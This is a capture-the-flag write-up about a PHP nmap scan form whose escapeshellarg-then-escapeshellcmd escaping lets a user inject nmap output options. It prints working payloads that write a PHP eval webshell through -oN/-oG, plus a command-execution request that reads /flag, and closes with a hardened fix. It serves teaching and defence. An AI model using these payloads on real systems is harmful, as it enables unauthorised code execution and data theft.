BUUCTF-WEB [网鼎杯 2020 朱雀组] Nmap 1

Writing a webshell through nmap's -oN / -oG output options

// Challenge source (excerpt of the scan form handler)
if (isset($_POST['host'])):
    if (!defined('WEB_SCANS')) {
        die('Web scans disabled');
    }

    $host = $_POST['host'];
    // Blacklist: any input containing "php" (case-insensitive) is rejected
    if(stripos($host,'php')!==false){
        die("Hacker...");
    }
    // escapeshellarg() followed by escapeshellcmd(): this double escaping is the bug
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);

    // Random 5-character result name; the scan result is written as XML via -oX
    $filename = substr(md5(time() . rand(1, 10)), 0, 5);
    $command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
    $result_scan = shell_exec($command);
    if (is_null($result_scan)) {
        die('Something went wrong');
    } else {
        header('Location: result.php?f=' . $filename);
    }

Getting the flag

Payload

The keyword php is filtered, so the short tag and the .phtml extension are used instead.

Option 1
'<?=eval($_GET[a]);?> -oN flag.phtml '
Option 2
'<?=eval($_GET[a]);?> -oG flag.phtml '

?a=system("cat /flag");

Two takeaways

1. Nmap writes a shell through the -oG / -oN options
> nmap 127.0.0.1 -p 0-1 "<?php eval($_GET['cmd']);?>" -oN cmd.php
Starting Nmap 7.70 ( https://nmap.org ) at 2021-04-14 16:51 中国标准时间
Failed to resolve "<?php eval($_GET['cmd']);?>".
Failed to resolve "<?php eval($_GET['cmd']);?>".
Skipping SYN Stealth Scan against xmind.net (127.0.0.1) because Windows does not support scanning your own machine (localhost) this way.
Nmap scan report for xmind.net (127.0.0.1)
Host is up.

PORT STATE SERVICE
0/tcp unknown unknown
1/tcp unknown tcpmux

Failed to resolve "<?php eval($_GET['cmd']);?>".
Nmap done: 1 IP address (1 host up) scanned in 4.64 seconds

C:\Users\root\Desktop
> dir
驱动器 C 中的卷是 Win10
卷的序列号是 C037-0A2C

C:\Users\root\Desktop 的目录

2021/04/14 16:51 <DIR> .
2021/04/14 16:51 <DIR> ..
2021/04/14 16:51 528 cmd.php # cmd.php was generated
1 个文件 528 字节
2 个目录 7,621,890,048 可用字节

The generated file contains both "<?php eval($_GET['cmd']);?>" and the scan results, written together into cmd.php.

nmap 127.0.0.1 -p 0-1 "<?php eval($_POST['cmd']);?>" -oG cmd.php
> nmap 127.0.0.1 -p 0-1 "<?php eval($_POST['cmd']);?>" -oG cmd.php
Starting Nmap 7.70 ( https://nmap.org ) at 2021-04-14 16:56 中国标准时间
Failed to resolve "<?php eval($_POST['cmd']);?>".
Failed to resolve "<?php eval($_POST['cmd']);?>".
Skipping SYN Stealth Scan against xmind.net (127.0.0.1) because Windows does not support scanning your own machine (localhost) this way.
Nmap scan report for xmind.net (127.0.0.1)
Host is up.

PORT STATE SERVICE
0/tcp unknown unknown
1/tcp unknown tcpmux

Failed to resolve "<?php eval($_POST['cmd']);?>".
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds

C:\Users\root\Desktop
> cat cmd.php
# Nmap 7.70 scan initiated Wed Apr 14 16:56:04 2021 as: F:\Tools\WEB\PentestBox\bin\Nmap\nmap.exe -p 0-1 -oG cmd.php 127.0.0.1 <?php eval($_POST['cmd']);?>
Host: 127.0.0.1 (xmind.net) Status: Up
Host: 127.0.0.1 (xmind.net) Ports: 0/unknown/tcp/////, 1/unknown/tcp//tcpmux///
# Nmap done at Wed Apr 14 16:56:08 2021 -- 1 IP address (1 host up) scanned in 4.59 seconds

Incidentally, nmap's other output options, such as -oX, also create a file, but special characters are replaced by HTML entities, like &lt;?php eval($_POST[&apos;cmd&apos;]);?&gt;, so only these two options are usable.

2. The problem caused by using escapeshellarg and escapeshellcmd together
<?php
$str = "sys'tem";
echo escapeshellarg($str);
?>
// 'sys'\''tem'

' is escaped directly to '\''.

<?php
$str = "sys'tem";
echo escapeshellcmd($str);
?>

// sys\'tem

' is escaped to \'.

Finally, using both functions together:

<?php
$str = "sys'tem";
$str = escapeshellarg($str);
$str = escapeshellcmd($str);
echo $str;
?>
// 'sys'\\''tem\'
// sys\tem'

The problem is now obvious: when the two functions are used together, certain strings escape the quoting.

<?php
$host = ' <?php eval($_POST["cmd"]);?> -oN cmd.php ';
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$command = "nmap ". $host;
echo $command;

?>

// nmap ' \<\?php eval\(\$_POST\[\"cmd\"\]\)\;\?\> -oN cmd.php '
// nmap ' <?php eval($_POST["cmd"]);?> -oN cmd.php '
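Added example (not code from the original write-up or the challenge): the defensive fix for the double-escaping bug shown above. It allow-lists the host with PHP's filter_var() as an IP address or hostname and then quotes it exactly once with escapeshellarg(); the function names, the /tmp path and the nmap options are assumptions.

```php
<?php
// Added example, not the challenge's code: the vulnerable double-escaping
// pattern beside a hardened version of the same handler.

// Vulnerable pattern from the challenge. escapeshellarg() single-quotes the
// value, but escapeshellcmd() then backslash-escapes the characters inside
// and any quote it sees as unpaired, so a value that starts with ' is split
// by the shell into several arguments and extra nmap options get through.
function build_command_vulnerable(string $host): string {
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    return "nmap -sV -oX /tmp/result " . $host;   // path/options assumed
}

// Hardened version: validate the value before it reaches the shell, then
// quote it exactly once. escapeshellarg() rewrites any embedded ' as '\''
// so the shell never leaves the quoted argument; escapeshellcmd() is meant
// for a whole command string and must not be applied on top of it.
function build_command_safe(string $host): string {
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $is_name = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    if (!$is_ip && !$is_name) {
        throw new InvalidArgumentException("rejected host: " . $host);
    }
    return "nmap -sV -oX /tmp/result " . escapeshellarg($host);
}

// Constructed input: the injection string from the write-up (leading and
// trailing quote included, as in the challenge payload).
$payload = "'<?php eval(\$_POST['cmd']);?> -oN cmd.php '";

echo build_command_vulnerable($payload), PHP_EOL;   // -oN cmd.php becomes separate args
try {
    echo build_command_safe($payload), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;                 // payload never reaches the shell
}
echo build_command_safe('127.0.0.1'), PHP_EOL;      // legitimate input still works
```

With the hardened function the blacklist on "php" is no longer what stands between the input and the shell; the allow-list and single quoting are.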